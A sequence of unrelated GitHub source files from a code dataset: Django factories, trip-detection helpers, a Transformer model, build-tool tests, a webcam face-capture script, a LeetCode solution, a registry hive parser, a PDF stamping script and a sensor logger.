UnitFactory(factory.django.DjangoModelFactory):\n class Meta:\n model = Unit\n\n # string, a dash, and two digits\n identifier = factory.Sequence(\n lambda n: f\"{fuzzy.FuzzyText(length=3).fuzz().lower()}-{n}{fuzzy.FuzzyInteger(0, 9).fuzz()}\"\n )\n created_by = factory.SubFactory(UserFactory)\n date_created = factory.Faker(\"date_time_this_month\", tzinfo=timezone.get_current_timezone())\n\n\nclass CheckInFactory(factory.django.DjangoModelFactory):\n class Meta:\n model = CheckIn\n\n unit = factory.SubFactory(UnitFactory)\n date_created = factory.Faker(\"date_time_this_month\", tzinfo=timezone.get_current_timezone())\n created_by = factory.SubFactory(UserFactory)\n image = factory.Faker(\"image_url\")\n message = factory.Faker(\"text\")\n # name_of_place = factory.Faker(\"city\")\n location = factory.LazyFunction(lambda: f\"{fuzzy.FuzzyFloat(-90, 90).fuzz()},{fuzzy.FuzzyFloat(-180, 180).fuzz()}\")\n","repo_name":"jvacek/FlameRelay","sub_path":"flamerelay/backend/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"35513549861","text":"import datetime\nfrom typing import List\nimport operator\nimport logging\nimport os\n\nfrom .post import Post\nfrom .trip_hypothesis import TripHyposesis\nfrom .geoutils import get_geo_distance\nfrom .utils import make_module_name\n\nmodule_logger = logging.getLogger(make_module_name(os.path.abspath(__file__)))\n\n\ndef find_countries_change(posts) -> List[TripHyposesis]:\n \"\"\"\n Find intervals with the same country \n \"\"\"\n trip_hypotheses = [TripHyposesis(posts[0])]\n countries = [trip_hypotheses[0].country]\n for post in posts[1:]:\n if post.country != trip_hypotheses[-1].country:\n countries.append(post.country)\n trip_hypotheses.append(TripHyposesis(post))\n else:\n trip_hypotheses[-1].add_post(post)\n module_logger.info('Find country sequence: {}'.format(countries))\n return trip_hypotheses\n\n\ndef calc_hypotheses_gap(h_1: TripHyposesis, h_2: TripHyposesis):\n \"\"\"\n Calc gap in days between TripHypothesis object\n \"\"\"\n time_delta = h_2.get_start() - h_1.get_end()\n return time_delta.days\n\n\ndef unite_close_by_time_hypotheses(\n trip_hypotheses: List[TripHyposesis],\n max_days_gap_in_trip\n ) -> List[TripHyposesis]:\n \"\"\"\n Unite hypothesis with same country that have between them small amout of days\n without geotags\n \"\"\"\n if len(trip_hypotheses) < 3:\n return trip_hypotheses\n new_trips = [trip_hypotheses[0]]\n i = 2\n last_added = 0\n while i < len(trip_hypotheses):\n if new_trips[-1].country != None and trip_hypotheses[i-1].country == None and \\\n new_trips[-1].country == trip_hypotheses[i].country and \\\n calc_hypotheses_gap(new_trips[-1], trip_hypotheses[i]) <= max_days_gap_in_trip:\n for post in trip_hypotheses[i-1].posts:\n post.country = new_trips[-1].country\n new_trips[-1].add_post(post)\n new_trips[-1].add_posts(trip_hypotheses[i].posts)\n last_added = i\n i += 2\n else:\n new_trips.append(trip_hypotheses[i-1])\n last_added = i-1\n i += 1\n while last_added != len(trip_hypotheses) - 1:\n last_added += 1\n new_trips.append(trip_hypotheses[last_added])\n countries = [trip.country for trip in new_trips]\n module_logger.info('New country sequence: {}'.format(countries))\n return new_trips\n\n\ndef split_trip_by_cities(\n trip: TripHyposesis\n ) -> List[TripHyposesis]:\n \"\"\"\n Split trip inside one country\n \"\"\"\n # Split by city\n new_trips = [TripHyposesis(trip.posts[0])]\n if len(trip.posts) == 1:\n return new_trips\n for post in trip.posts[1:]:\n if (new_trips[-1].city is None and post.city is None) or \\\n (new_trips[-1].city is not None and post.city is not None and \\\n new_trips[-1].city.name == post.city.name):\n new_trips[-1].add_post(post)\n else:\n new_trips.append(TripHyposesis(post))\n # Unite posts without geotags with the closest in timeline city\n # (assume that on edges of the interval inside one country we have posts with \n # information about city, because of a construction process)\n if len(new_trips) < 3:\n return new_trips\n new_trips_without_gaps = []\n for i, city_trip in enumerate(new_trips):\n if city_trip.city is None:\n for p, post in enumerate(city_trip.posts):\n if calc_hypotheses_gap(new_trips[i-1], city_trip) > \\\n calc_hypotheses_gap(city_trip, new_trips[i+1]):\n j = p\n while j < len(city_trip.posts):\n city_trip.posts[j].city = new_trips[i+1].city\n j += 1\n new_trips[i+1].add_posts_in_begin(city_trip.posts[p:])\n break\n else:\n post.city = new_trips[i-1].city\n new_trips_without_gaps[-1].add_post(post)\n else:\n new_trips_without_gaps.append(city_trip)\n return new_trips_without_gaps\n \n\ndef find_city_change(trip_hypotheses: List[TripHyposesis]) -> List[TripHyposesis]:\n \"\"\"\n Find change of cities\n \"\"\"\n new_trips = []\n for trip in trip_hypotheses:\n if trip.country == None:\n new_trips.append(trip)\n else:\n new_trips.extend(split_trip_by_cities(trip))\n return new_trips\n\n\ndef find_local_cities(\n trip_hypotheses: List[TripHyposesis],\n min_local_city_counter,\n max_local_cities_amount,\n max_satelite_towns_distance\n ) -> List[str]:\n \"\"\"\n Calculate locations stats and find local cities\n \"\"\"\n local_cities = []\n cities_counter = dict()\n cities_dict = dict()\n for trip in trip_hypotheses:\n if trip.city is None:\n continue\n if trip.city.name in cities_counter:\n cities_counter[trip.city.name] += 1\n else:\n cities_dict[trip.city.name] = trip.city\n cities_counter[trip.city.name] = 1\n cities_sorted = sorted(cities_counter.items(), key=operator.itemgetter(1), reverse=True)\n if cities_sorted[0][1] > 1:\n local_cities.append(cities_sorted[0][0])\n for city in cities_sorted[1:max_local_cities_amount]:\n if city[1] >= min_local_city_counter:\n local_cities.append(city[0])\n # Add satelite towns for local cities\n additional_local_cities = []\n for city in cities_dict:\n if city not in local_cities:\n for local_city in local_cities:\n if get_geo_distance(cities_dict[city], cities_dict[local_city]) \\\n < max_satelite_towns_distance:\n additional_local_cities.append(city)\n break\n local_cities.extend(additional_local_cities) \n return local_cities\n\n\ndef exclude_local_hypothesis(\n trip_hypotheses: List[TripHyposesis],\n local_cities: List[str]\n ) -> List[TripHyposesis]:\n \"\"\"\n Exclude local cities and hypotheses without location\n \"\"\"\n new_trips = []\n for trip in trip_hypotheses:\n if trip.country is not None and trip.city.name not in local_cities:\n new_trips.append(trip)\n return new_trips\n\n\ndef exclude_long_trips(\n trip_hypotheses: List[TripHyposesis],\n max_trip_length\n ) -> List[TripHyposesis]:\n \"\"\"\n Exclude or split very long trips\n \"\"\"\n new_trips = []\n for trip in trip_hypotheses:\n if trip.get_duration_in_days() <= max_trip_length:\n new_trips.append(trip)\n return new_trips\n\n\ndef unite_small_city_trips(\n trip_hypotheses: List[TripHyposesis], \n min_posts_in_trip_amount: int,\n max_days_gap_in_trip: int,\n max_cities_distance_in_trip: int\n ) -> List[TripHyposesis]:\n \"\"\"\n Unite small city trips in one big country trip\n \"\"\"\n new_trips = [trip_hypotheses[0]]\n if len(trip_hypotheses) == 1:\n return new_trips\n for trip in trip_hypotheses[1:]:\n if trip.country == new_trips[-1].country:\n days_gap = calc_hypotheses_gap(new_trips[-1], trip)\n geo_distance = get_geo_distance(new_trips[-1].posts[-1].city, trip.posts[0].city)\n if days_gap <= max_days_gap_in_trip and (len(trip.posts) <= min_posts_in_trip_amount or \\\n len(new_trips[-1].posts) <= min_posts_in_trip_amount): # and \\\n # geo_distance < max_cities_distance_in_trip:\n module_logger.info('Unite {} with {}'.format(\n new_trips[-1].posts[-1].city.name, \n trip.posts[-1].city.name\n )\n )\n new_trips[-1].add_posts(trip.posts)\n continue\n else:\n module_logger.info('Not unite {}, distance {}, days gap {}'.format(\n trip.posts[-1].city.name, \n geo_distance,\n days_gap\n )\n )\n new_trips.append(trip)\n return new_trips\n\n","repo_name":"mashaka/Inspiry","sub_path":"algo/compute_tools.py","file_name":"compute_tools.py","file_ext":"py","file_size_in_byte":8081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16681365677","text":"from transformers import BertModel, BertConfig\nimport torch\nfrom torch import nn\n\n\nclass Transformer(nn.Module):\n def __init__(self, vocab_size=21128):\n super().__init__()\n encoder_config = BertConfig(\n num_hidden_layers=6,\n vocab_size=vocab_size,\n hidden_size=512,\n num_attention_heads=8,\n )\n self.encoder = BertModel(encoder_config)\n\n decoder_config = BertConfig(\n num_hidden_layers=6,\n vocab_size=vocab_size,\n hidden_size=512,\n num_attention_heads=8,\n )\n decoder_config.is_decoder = True\n decoder_config.add_cross_attention = True\n self.decoder = BertModel(decoder_config)\n\n self.linear = nn.Linear(512, vocab_size, bias=False)\n\n def forward(self, input_ids, mask_encoder_input, output_ids, mask_decoder_input):\n encoder_outputs = self.encoder(input_ids, mask_encoder_input)\n encoder_hidden_states = encoder_outputs[0]\n # out: [batch_size, max_length, hidden_size]\n outs = self.decoder(\n output_ids, mask_decoder_input, encoder_hidden_states=encoder_hidden_states\n )\n\n out = self.linear(outs[0])\n return out\n\n def reload_from(self, path, resize_vocab_to=None, device=None):\n state_dict = torch.load(path, map_location=device)\n\n if resize_vocab_to:\n extra_size = (\n resize_vocab_to\n - state_dict[\"encoder.embeddings.word_embeddings.weight\"].shape[0]\n )\n decoder_emb = state_dict[\"decoder.embeddings.word_embeddings.weight\"]\n device = decoder_emb.device\n encdoer_emb = state_dict[\"encoder.embeddings.word_embeddings.weight\"]\n state_dict[\"decoder.embeddings.word_embeddings.weight\"] = torch.cat(\n (\n decoder_emb,\n torch.rand(\n extra_size,\n decoder_emb.shape[1],\n dtype=torch.float32,\n device=device,\n ),\n ),\n dim=0,\n )\n extra_size = resize_vocab_to - encdoer_emb.shape[0]\n state_dict[\"encoder.embeddings.word_embeddings.weight\"] = torch.cat(\n (\n encdoer_emb,\n torch.rand(\n extra_size,\n encdoer_emb.shape[1],\n dtype=torch.float32,\n device=device,\n ),\n ),\n dim=0,\n )\n extra_size = resize_vocab_to - state_dict[\"linear.weight\"].shape[0]\n linear_layer = state_dict[\"linear.weight\"]\n state_dict[\"linear.weight\"] = torch.cat(\n (\n linear_layer,\n torch.rand(extra_size, 512, dtype=torch.float32, device=device),\n ),\n 0,\n )\n self.load_state_dict(state_dict, strict=False)\n","repo_name":"BigBinnie/D4_baseline","sub_path":"models/transformer/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"24454386983","text":"import unittest, os, sys, tempfile\r\n\r\nfrom wudoo.FSItem import FSItem\r\nfrom wudoo.SystemWillExecutor import SystemWillExecutor\r\n\r\nfrom wudoo.compile.cpp.Front import DefaultCPPCompilation\r\nfrom wudoo.compile.BaseCompilation import BaseCompilation\r\nfrom wudoo.compile.cpp.CPPProject import CPPProject\r\nfrom wudoo.compile.cpp.gcc.GPPCompiler import GPPCompiler\r\nfrom wudoo.filter.ExtensionBasedFilter import ExtensionBasedFilter\r\n\r\nfrom tests.fakes.StoreCallsWillExecutor import StoreCallsWillExecutor\r\n\r\nclass TestEasyExamples(unittest.TestCase):\r\n\tsys.path.append(\r\n\t\tos.path.normpath(os.path.join(sys.path[0], \"..\", \"Examples\", \"Compile\", \"CPP\", \"UseExportHeaders\", \"CM\"))\t\t\t\t\t\r\n\t\t)\r\n\timport build_useexphdr as build_useexphdr_prj\r\n\t\r\n\tsys.path.append(\r\n\t\tos.path.normpath(os.path.join(sys.path[0], \"..\", \"Examples\", \"Compile\", \"CPP\", \"UseExportHeaders\", \"CM\", \"sub-missions\"))\t\t\t\t\t\r\n\t\t)\r\n\timport build_dependproxy_1 as build_dependproxy_prj\r\n\t\r\n\tdef testCompile(self):\r\n\t\tfrom tests.compile.TestCompilation import TestCompilation\r\n\t\tproject = TestCompilation.build_easy_prj.getProject()\r\n\t\tcompilation = BaseCompilation(project)\r\n#\t\tcompilation.setGoalFSItem(FSItem(\"C:\\Work\", \"hello.exe\"))\r\n\t\ttmpDir = tempfile.mkdtemp()\r\n#\t\tstrat = AllocInSpecifDirStrategy(tmpDir, \".o\")\r\n#\t\tcompilation.setAllocateObjStrategy(strat)\r\n#\t\tcompilation.setCompiler(GPPCompiler())\r\n\t\twe = StoreCallsWillExecutor()\r\n\t\tfrom wudoo.compile.cpp.Front import setupPathsFromRoot, wdefaultBuild\r\n\t\tdef setupCompilationCallback(compilation, project):\r\n\t\t\tsetupPathsFromRoot(compilation, project, tmpDir)\r\n\t\twdefaultBuild(project, setupCompilationCallback, we)\r\n#\t\tcompilation.compile(we)\r\n#\t\tcompilation.resolveDependings(we)\r\n#\t\tcompilation.buildBinary(we)\r\n\t\twe.history.sort()\r\n\t\tcmd = we.history[2]\r\n\t\tself.assertTrue(cmd.find(\"g++\") > -1)\r\n\t\tself.assertTrue(cmd.find(\"-c\") > -1)\r\n\t\tself.assertTrue(cmd.find(\"Main.cpp\") > -1)\r\n\t\tself.assertTrue(cmd.find(\"-o\") > -1)\r\n\t\tself.assertTrue(cmd.find(\"Main.o\") > -1)\r\n\t\tcmd = we.history[0]\r\n\t\tself.assertTrue(cmd.find(\"g++\") > -1)\r\n\t\tself.assertTrue(cmd.find(\"Hello.o\") > -1)\r\n\t\tself.assertTrue(cmd.find(\"Main.o\") > -1)\r\n\t\t\r\n\tdef testEasyBuildReal(self):\r\n\t\tfrom tests.compile.TestCompilation import TestCompilation\r\n\t\tfrom wudoo.compile.cpp.Front import setupPathsFromRoot, wdefaultBuild\r\n\t\tproject = TestCompilation.build_easy_prj.getProject()\r\n\t\ttmpDir = tempfile.mkdtemp()\r\n\t\tdef setupCompilationCallback(compilation, project):\r\n\t\t\tsetupPathsFromRoot(compilation, project, tmpDir)\r\n\t\twdefaultBuild(project, setupCompilationCallback)\r\n\t\tproject = CPPProject(\"Prj\", tmpDir, tmpDir)\r\n\t\tproject.addSrcFolders(\"\\n\".join(os.listdir(tmpDir)))\r\n\t\tproject.setSourceFilter(ExtensionBasedFilter({\"o\": \"o\", \"exe\": \"exe\"}));\r\n\t\tproject.findSources()\r\n\t\tobjItems = project.getSourceItems()\r\n\t\tobjPaths = [io.getPathNameExt(1) for io in objItems]\r\n\t\tobjPaths.sort()\r\n\t\tself.assertEquals([\"Bin\\\\BuildEasy.exe\", \"Obj\\\\Src\\\\Hello.o\", \"Obj\\\\Src\\\\Main.o\"], objPaths)\r\n\t\t\r\n\tdef testBuildDepend(self):\r\n\t\tproject = TestEasyExamples.build_useexphdr_prj.getProject()\r\n\t\ttmpDir = tempfile.mkdtemp()\r\n\t\tfrom wudoo.compile.cpp.Front import setupPathsFromRoot, wdefaultBuild\r\n\t\tdef setupCompilationCallback(compilation, project):\r\n\t\t\tsetupPathsFromRoot(compilation, project, tmpDir)\r\n\t\twdefaultBuild(project, setupCompilationCallback)\r\n\t\tproject = CPPProject(\"PrjFindSources\", tmpDir, tmpDir)\r\n\t\tproject.addSrcFolders(\"\\n\".join(os.listdir(tmpDir)))\r\n\t\tproject.setSourceFilter(ExtensionBasedFilter({\"o\": \"o\", \"exe\": \"exe\"}));\r\n\t\tproject.findSources()\r\n\t\tobjItems = project.getSourceItems()\r\n\t\tobjPaths = [io.getPathNameExt(1) for io in objItems]\r\n\t\tobjPaths.sort()\r\n\t\tself.assertEquals(\r\n\t\t\t[\"Bin\\\\UseExportHdr.exe\", \"Obj\\\\Src\\\\main.o\", \"Outer\\\\ExportHdr\\\\SrcMain\\\\main.o\", \"Outer\\\\ExportHdr\\\\Src\\\\ExportHello.o\"],\r\n\t\t\tobjPaths\r\n\t\t\t)\r\n\r\n\tdef testProxyStatlibEquilibristic(self):\r\n\t\tproject = TestEasyExamples.build_dependproxy_prj.getProject()\r\n\t\tproject.findSources()\r\n\t\ttmpDir = tempfile.mkdtemp()\r\n\t\tfrom wudoo.compile.cpp.Front import wdefaultBuild, setupPathsFromRoot \r\n\t\tdef setupTmpdirCallback(compilation, project):\r\n\t\t\tsetupPathsFromRoot(compilation, project, tmpDir)\r\n\t\twdefaultBuild(project, setupTmpdirCallback)\r\n\t\r\n\t\tproject = CPPProject(\"Prj\", tmpDir, tmpDir)\r\n\t\tproject.addSrcFolders(\"\\n\".join(os.listdir(tmpDir)))\r\n\t\tproject.setSourceFilter(ExtensionBasedFilter({\"o\": \"o\", \"exe\": \"exe\"}));\r\n\t\tproject.findSources()\r\n\t\tobjItems = project.getSourceItems()\r\n\t\tobjPaths = [io.getPathNameExt(1) for io in objItems]\r\n\t\tobjPaths.sort()\r\n\t\tself.assertEquals([\"Bin\\\\UseExportHdr-dependProxy.exe\", \"Obj\\\\CM\\\\sub-missions\\\\sub-src\\\\proxy\\\\main.o\", \"Outer\\\\ExportHdr\\\\SrcMain\\\\main.o\", \"Outer\\\\ExportHdr\\\\Src\\\\ExportHello.o\", \"Outer\\\\SLib-UseExportHdr\\\\CM\\\\sub-missions\\\\sub-src\\\\slib\\\\foo.o\", \"Outer\\\\SLib-UseExportHdr\\\\Src\\\\main.o\"], \r\n\t\t\tobjPaths\r\n\t\t\t)\r\n\r\n","repo_name":"XueHL/wudoo","sub_path":"Tests/tests/compile/examples/TestEasyExamples.py","file_name":"TestEasyExamples.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32131485406","text":"#import necessary libraries \r\nimport numpy as np\r\nimport mediapipe as mp\r\nfrom cvzone.FaceMeshModule import FaceMeshDetector\r\nimport cv2\r\nimport os\r\n\r\n#Initialize 'name' to trigger only when a new person is identified.\r\n#create a data base or folder in the employee name or ID is initialised in specified location.\r\n#employee name or ID, path to store image is managed through backend to frontend api\r\nname=input('Enter employee name: ')\r\npath= \"C:\\\\Users\\\\Mypc\\\\Desktop\\\\temp\\\\\"\r\nos.chdir(path)\r\nos.makedirs(name)\r\n\r\n#Webcam initialized with LED indication.\r\ncam=cv2.VideoCapture(0)\r\ncv2.namedWindow('output',cv2.WINDOW_NORMAL)\r\ncv2.resizeWindow('output',500,300)\r\n\r\ndetector = FaceMeshDetector(maxFaces=1)\r\nmp_drawings=mp.solutions.drawing_utils\r\nmp_holistic=mp.solutions.holistic\r\n\r\n\r\n#ImageCount statrs with initial count 'zero'\r\nimg_counter=0\r\ncase=img_counter\r\ndegree_sign = u\"\\N{DEGREE SIGN}\"\r\ndef switchcase(case):\r\n switch={0:\"Look Straight\",\r\n 1:\"Turn Face Left\",\r\n 2:\"Turn Face Right\",\r\n 3:\"Turn 45\"+degree_sign+\"right\",\r\n 4:\"Turn 45\"+degree_sign+\"left\",\r\n 5:\"Move a step back\",\r\n 6:\"Move a step forward\",\r\n 7:\"capture face smiling\",\r\n 8:\"capture with mask\",\r\n 9:\"Turn Left with mask\",\r\n }\r\n return switch.get(case)\r\n \r\n\r\n#define percentage of detection confidence through mediapipe required.\r\nwith mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5) as holistic:\r\n while True:\r\n ret, frame = cam.read()\r\n roi = frame[180:375,200:400]\r\n \r\n if not ret:\r\n print(\"failed to grab frame\")\r\n break\r\n \r\n results = holistic.process(frame)\r\n #frame, faces = detector.findFaceMesh(frame) \r\n overlay=frame.copy()\r\n output=frame.copy()\r\n cv2.rectangle(overlay, (200,180), (400,375),(255,0,0), 4)\r\n \r\n if results.face_landmarks:\r\n mp_drawings.draw_landmarks(overlay,results.face_landmarks,mp_holistic.FACE_CONNECTIONS,\r\n mp_drawings.DrawingSpec(color=(110,150,10),thickness=2,circle_radius=2),\r\n mp_drawings.DrawingSpec(color=(256,80,121),thickness=2,circle_radius=2)\r\n )\r\n mp_drawings.draw_landmarks(overlay,results.pose_landmarks,mp_holistic.POSE_CONNECTIONS,\r\n mp_drawings.DrawingSpec(color=(245,117,66),thickness=2,circle_radius=4),\r\n mp_drawings.DrawingSpec(color=(245,66,230),thickness=2,circle_radius=2)\r\n )\r\n else:\r\n print(\"Find Face\")\r\n cv2.putText(overlay,switchcase(img_counter),(130,450),cv2.FONT_HERSHEY_SIMPLEX, 2,(0,0,255),3)\r\n alpha=0.2\r\n cv2.addWeighted(overlay,alpha,output,1-alpha,0,output) \r\n cv2.imshow('output',output)\r\n \r\n k = cv2.waitKey(1)\r\n if k%256 == 27:\r\n # ESC pressed\r\n print(\"Escape hit, closing...\")\r\n break\r\n elif k%256 == 32:\r\n # SPACE pressed\r\n img_name =\"C:\\\\Users\\\\Mypc\\\\Desktop\\\\temp\\\\\"+ name +\"/image_{}.jpg\".format(img_counter)\r\n cv2.imwrite(img_name,roi)\r\n print(\"{} written!\".format(img_name))\r\n img_counter += 1\r\n if img_counter==10:\r\n break\r\ncam.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"DileepChakravarthy7/Head_shots","sub_path":"Onboard_process.py","file_name":"Onboard_process.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18214915752","text":"class Solution:\n def maximumScore(self, nums: List[int], multipliers: List[int]) -> int:\n @functools.lru_cache(2000)\n def dp(s: int, i: int) -> int:\n if i == len(multipliers):\n return 0\n\n e = len(nums) - (i - s) - 1\n pickStart = nums[s] * multipliers[i] + dp(s + 1, i + 1)\n pickEnd = nums[e] * multipliers[i] + dp(s, i + 1)\n return max(pickStart, pickEnd)\n\n return dp(0, 0)\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/1770. Maximum Score from Performing Multiplication Operations/1770.py","file_name":"1770.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"32406720828","text":"from aiowinreg.filestruct.keytypes import NTRegistryKeyTypes\n\nclass NTRegistryCell:\n\tdef __init__(self):\n\t\tself.size = None\n\t\tself.data = None\n\t\n\t@staticmethod\n\tdef load_data_from_offset(reader, offset, is_file = True):\n\t\t\"\"\"\n\t\tReturns a HBIN block from the data in the reader at offset\n\t\t\"\"\"\n\t\tif is_file is True:\n\t\t\treader.seek(4096+offset,0)\n\t\telse:\n\t\t\treader.seek(offset,0)\n\t\tcell = NTRegistryCell.read(reader)\n\t\treturn cell.data\n\n\t@staticmethod\n\tasync def aload_data_from_offset(reader, offset, is_file = True):\n\t\t\"\"\"\n\t\tAsync\n\t\tReturns a HBIN block from the data in the reader at offset\n\t\t\"\"\"\n\t\tif is_file is True:\n\t\t\tawait reader.seek(4096+offset,0)\n\t\telse:\n\t\t\tawait reader.seek(offset,0)\n\t\tcell = await NTRegistryCell.aread(reader)\n\t\treturn cell.data\n\n\t@staticmethod\n\tasync def aread(reader):\n\t\tcell = NTRegistryCell()\n\t\tt = await reader.read(4)\n\t\tif t == b'hbin':\n\t\t\tcell.size = 0\n\t\t\treturn cell\n\n\t\tcell.size = int.from_bytes(t, 'little', signed = True)\n\t\tcell.size = cell.size * -1\n\t\t\n\t\tif cell.size == 0:\n\t\t\treturn cell\n\t\telif cell.size > 0:\n\t\t\tcell.data = await reader.read(cell.size - 4)\n\t\t\tif cell.data[:2] in NTRegistryKeyTypes:\n\t\t\t\tcell.data = NTRegistryKeyTypes[cell.data[:2]].from_bytes(cell.data)\n\t\t\t\n\t\telse:\n\t\t\tcell.data = await reader.read( (-1)*cell.size - 4)\n\n\t\treturn cell\n\n\t@staticmethod\n\tdef read(reader):\n\t\tcell = NTRegistryCell()\n\t\tt = reader.read(4)\n\t\tif t == b'hbin':\n\t\t\tcell.size = 0\n\t\t\treturn cell\n\t\tcell.size = int.from_bytes(t, 'little', signed = True)\n\t\tcell.size = cell.size * -1\n\t\tif cell.size == 0:\n\t\t\treturn cell\n\t\telif cell.size > 0:\n\t\t\tcell.data = reader.read(cell.size - 4)\n\t\t\tif cell.data[:2] in NTRegistryKeyTypes:\n\t\t\t\tcell.data = NTRegistryKeyTypes[cell.data[:2]].from_bytes(cell.data)\n\t\t\t\n\t\telse:\n\t\t\tcell.data = reader.read( (-1)*cell.size - 4)\n\n\t\treturn cell\n\n\tdef __str__(self):\n\t\tt = '== NT Registry Cell struct ==\\r\\n'\n\t\tfor k in self.__dict__:\n\t\t\tt += '%s: %s \\r\\n' % (k, self.__dict__[k])\n\t\treturn t\n","repo_name":"ryanmrestivo/red-team","sub_path":"Exploitation-Tools/CrackMapExec/site-packages/aiowinreg/filestruct/regcell.py","file_name":"regcell.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"43231469129","text":"import PyPDF4\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.pdfgen import canvas\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives.asymmetric import rsa\n\n# Generar una clave privada RSA\nprivate_key = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048\n)\n\n# Obtener la clave pública correspondiente\npublic_key = private_key.public_key()\n\n# Crear un archivo PDF en blanco para la firma digital\nfirma_pdf = canvas.Canvas(\"firma.pdf\", pagesize=letter)\nfirma_pdf.setFont(\"Helvetica\", 8) # Cambiar el tamaño de la fuente a 8\n\n# Dibujar el sello con tu nombre en el archivo PDF\nfirma_pdf.drawString(10, 10, \"Arquitecto de software Cenabast\") # Cambiar la posición del sello\nfirma_pdf.drawString(10, 25, \"Firmado por: Sergio Navarro M.\") # Cambiar la posición del sello\n\n# Guardar el archivo PDF con el sello\nfirma_pdf.save()\n\n# Abrir el archivo PDF a firmar\nwith open('ejemplo.pdf', 'rb') as file:\n pdf = PyPDF4.PdfFileReader(file)\n num_pages = pdf.getNumPages()\n\n # Agregar el sello en cada página del archivo PDF\n writer = PyPDF4.PdfFileWriter()\n\n for page_num in range(num_pages):\n page = pdf.getPage(page_num)\n\n # Agregar el sello como anotación en forma de sello\n x = 10 # Cambiar la coordenada x a un valor más pequeño\n y = 10 # Cambiar la coordenada y a un valor más pequeño\n width = 200\n height = 50\n stamp = PyPDF4.PdfFileReader(\"firma.pdf\").getPage(0)\n page.mergeTranslatedPage(stamp, x, y, expand=True)\n\n # Agregar la página firmada al objeto PdfFileWriter\n writer.addPage(page)\n\n # Guardar el archivo PDF firmado\n with open('ejemplo_firmado.pdf', 'wb') as output_file:\n writer.write(output_file)","repo_name":"SnavarroM/firma_digital","sub_path":"firma_3.py","file_name":"firma_3.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11738458219","text":"import time\nimport multiprocessing\n\nfrom .InterfaceResource import InterfaceResource\nfrom . import logger\n\nsensor_logger = logger.EventLogger(name=__name__)\n\n\nclass TaskCentre:\n def __init__(self, sensor_dict: dict):\n self.log = sensor_logger\n self.end_at = None\n sensor_list = list(sensor_dict.values())\n self.queue = []\n for sensor in sensor_list:\n self.log.write(\"info\", \"Found sensor: {}\".format(sensor.name))\n if self.queue:\n if sensor.connection.type == InterfaceResource.EXE:\n self.queue.append({sensor.name: sensor})\n else:\n for self.queue_dict in self.queue:\n ombre = self.queue_dict\n (nome, oggetto) = ombre.popitem()\n if oggetto.connection.type != sensor.connection.type:\n self.queue.append({sensor.name: sensor})\n else:\n oggetto_config = getattr(oggetto.connection, oggetto.connection.config)\n sensor_config = getattr(sensor.connection, sensor.connection.config)\n if oggetto_config != sensor_config:\n self.queue.append({sensor.name: sensor})\n else:\n self.queue_dict[sensor.name] = sensor\n else:\n self.queue.append({sensor.name: sensor})\n\n def set_end_time(self, end_time):\n if isinstance(end_time, str): # Input is time in string\n self.end_at = time.mktime(time.strptime(end_time, \"%Y-%m-%d %H:%M:%S\"))\n elif isinstance(end_time, int) or isinstance(end_time, float): # Input is duration\n # in seconds\n self.end_at = time.time() + end_time\n else:\n raise TypeError(\"Failed to set period for logger. Please check the format again.\")\n\n def start(self, csv_log_object, period: float):\n runner = MeasurementExec(self.queue)\n # In case there are still some initialisation steps defined under init function\n runner.init_sensors()\n\n # list of sensor name with default sequence\n list_sensor = []\n for entries in self.queue:\n for entry in entries:\n list_sensor.append(entry)\n if \"Time\" in list_sensor:\n tmp_list = [list_sensor.pop(list_sensor.index(\"Time\"))]\n for element in list_sensor:\n tmp_list.append(element)\n list_sensor = tmp_list\n\n csv_log_object.register(list_sensor) # write heading to CSV\n\n while True:\n next_logging_time = time.time() + period\n readings = runner.run()\n print(\"\") # print new line\n csv_log_object.write(readings)\n if self.end_at:\n if self.end_at < time.time():\n break # Exit loop once reached end time\n while next_logging_time > time.time():\n time.sleep(0.001) # sleep for 1 millisecond\n\n\nclass MeasurementExec:\n def __init__(self, sensor_queue=None):\n self.result = dict()\n self.sensor_queue = []\n if sensor_queue:\n self.add_sensors(sensor_queue)\n\n def add_sensors(self, sensor_queue: list):\n self.sensor_queue = sensor_queue\n\n def get_sensors(self):\n return self.sensor_queue\n\n def init_sensors(self):\n for x in self.sensor_queue:\n for y in x:\n if hasattr(x[y], \"init\"):\n x[y].init()\n\n def thread(self, sensor_dict: dict):\n result_dict = dict()\n for each in sensor_dict:\n result = sensor_dict[each].read()\n print(\"{}: {}\".format(each, result))\n result_dict[each] = result\n return result_dict\n\n def run(self):\n self.result = dict()\n pool = multiprocessing.Pool(len(self.sensor_queue))\n dict_result = pool.map(self.thread, self.sensor_queue)\n for element in dict_result:\n self.result.update(element)\n return self.result\n","repo_name":"bernardkkt/loguiado","sub_path":"lib/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34307692721","text":"#!/usr/bin/python3\n\n\"\"\"\n##############\nEventDetective\n##############\nDetecteert events gegeven dataset\n\"\"\"\n\nimport os, sys, json, pickle\nfrom collections import defaultdict, Counter\nimport nltk\nfrom math import log, log2\nfrom sklearn.naive_bayes import 